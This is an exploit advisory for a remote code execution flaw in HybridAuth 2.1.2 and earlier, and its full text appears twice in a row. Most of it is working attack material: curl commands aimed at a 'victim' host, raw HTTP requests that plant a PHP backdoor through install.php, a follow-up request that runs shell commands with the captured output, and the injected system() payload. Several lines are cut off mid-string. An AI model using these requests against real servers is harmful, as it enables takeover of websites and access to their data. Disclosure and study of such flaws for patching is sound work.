##############################
# _ ___ _ _ ____ ____ _ _____
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
# | | | | | | \| | | _| | / _ \ | |
# | |__| |_| | |\ | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/ \_\_|
#
# HybridAuth <= 2.1.2 Remote Code Execution
# Website : http://hybridauth.sourceforge.
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : August 5, 2014
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/
#
##############################
[+] Description
==============================
HybridAuth enable developers to easily build social applications to engage
websites
vistors and customers on a social level by implementing social signin,
social sharing,
users profiles, friends list, activities stream, status updates and more.
[+] Exploit
==============================
The default installation leave "install.php" untouched.
$ curl http://victim/hybridauth/
'GLOBAL_HYBRID_AUTH_URL_BASE="
$ curl http://victim/hybridauth/
[+] Proof-of-Concept
==============================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
Download :
http://sourceforge.net/
1. Inject Evil PHP Backdoor
POST /hybridauth/install.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 51
GLOBAL_HYBRID_AUTH_URL_BASE=".
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 2437
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<html>
<head>
<title>HybridAuth Installer</title>
...
2. Gaining access to the PHP backdoor
POST /hybridauth/config.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 14
0=id;ls%20-lha
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:54:56 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 40K
drwxrwxr-x 3 longcat longcat 4.0K Feb 15 2013 .
drwxr-xr-x 4 longcat www-data 4.0K Aug 5 01:14 ..
drwxrwxr-x 5 longcat longcat 4.0K Feb 15 2013 Hybrid
- -rw-rw-r-- 1 www-data www-data 2.5K Aug 5 01:53 config.php
- -rw-rw-r-- 1 longcat longcat 488 Feb 15 2013 index.php
- -rw-rw-r-- 1 longcat longcat 18K Feb 16 2013 install.php
[+] Vulnerability Analysis
==============================
Filename: ./install.php
...
if( count( $_POST ) ): <-- user controlled input HTTP POST data
\/-- Read a template file
$CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.
);
foreach( $_POST AS $k => $v ):
$v = strip_tags( $v );
$z = "#$k#";
\/-- #POST data's keys# found in template file will be replaced
with POST data's values
| so we can simply replace these existing values with something
fun :)
$CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
endforeach;
...
\/-- upload that replaced template contents into config.php
$is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE .
"config.php", $CONFIG_TEMPLATE );
...
Filename: ./Hybrid/resources/config.php.
...
return
array(
"base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#
replaced with arbitrary PHP code
...
So this is what injected "config.php" looks like...
Filename: ./config.php
<?php
...
return
array(
"base_url" => "".system($_POST[0]));/*",
"providers" => array (
// openid providers
"OpenID" => array (
"enabled" => #OPENID_ADAPTER_STATUS#
),
...
Happy Pwning ;)
LongCat
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# _ ___ _ _ ____ ____ _ _____
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
# | | | | | | \| | | _| | / _ \ | |
# | |__| |_| | |\ | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/ \_\_|
#
# HybridAuth <= 2.1.2 Remote Code Execution
# Website : http://hybridauth.sourceforge.
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : August 5, 2014
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/
#
##############################
[+] Description
==============================
HybridAuth enable developers to easily build social applications to engage
websites
vistors and customers on a social level by implementing social signin,
social sharing,
users profiles, friends list, activities stream, status updates and more.
[+] Exploit
==============================
The default installation leave "install.php" untouched.
$ curl http://victim/hybridauth/
'GLOBAL_HYBRID_AUTH_URL_BASE="
$ curl http://victim/hybridauth/
[+] Proof-of-Concept
==============================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
Download :
http://sourceforge.net/
1. Inject Evil PHP Backdoor
POST /hybridauth/install.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 51
GLOBAL_HYBRID_AUTH_URL_BASE=".
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 2437
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<html>
<head>
<title>HybridAuth Installer</title>
...
2. Gaining access to the PHP backdoor
POST /hybridauth/config.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 14
0=id;ls%20-lha
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:54:56 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 40K
drwxrwxr-x 3 longcat longcat 4.0K Feb 15 2013 .
drwxr-xr-x 4 longcat www-data 4.0K Aug 5 01:14 ..
drwxrwxr-x 5 longcat longcat 4.0K Feb 15 2013 Hybrid
- -rw-rw-r-- 1 www-data www-data 2.5K Aug 5 01:53 config.php
- -rw-rw-r-- 1 longcat longcat 488 Feb 15 2013 index.php
- -rw-rw-r-- 1 longcat longcat 18K Feb 16 2013 install.php
[+] Vulnerability Analysis
==============================
Filename: ./install.php
...
if( count( $_POST ) ): <-- user controlled input HTTP POST data
\/-- Read a template file
$CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.
);
foreach( $_POST AS $k => $v ):
$v = strip_tags( $v );
$z = "#$k#";
\/-- #POST data's keys# found in template file will be replaced
with POST data's values
| so we can simply replace these existing values with something
fun :)
$CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
endforeach;
...
\/-- upload that replaced template contents into config.php
$is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE .
"config.php", $CONFIG_TEMPLATE );
...
Filename: ./Hybrid/resources/config.php.
...
return
array(
"base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#
replaced with arbitrary PHP code
...
So this is what injected "config.php" looks like...
Filename: ./config.php
<?php
...
return
array(
"base_url" => "".system($_POST[0]));/*",
"providers" => array (
// openid providers
"OpenID" => array (
"enabled" => #OPENID_ADAPTER_STATUS#
),
...
Happy Pwning ;)
LongCat
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information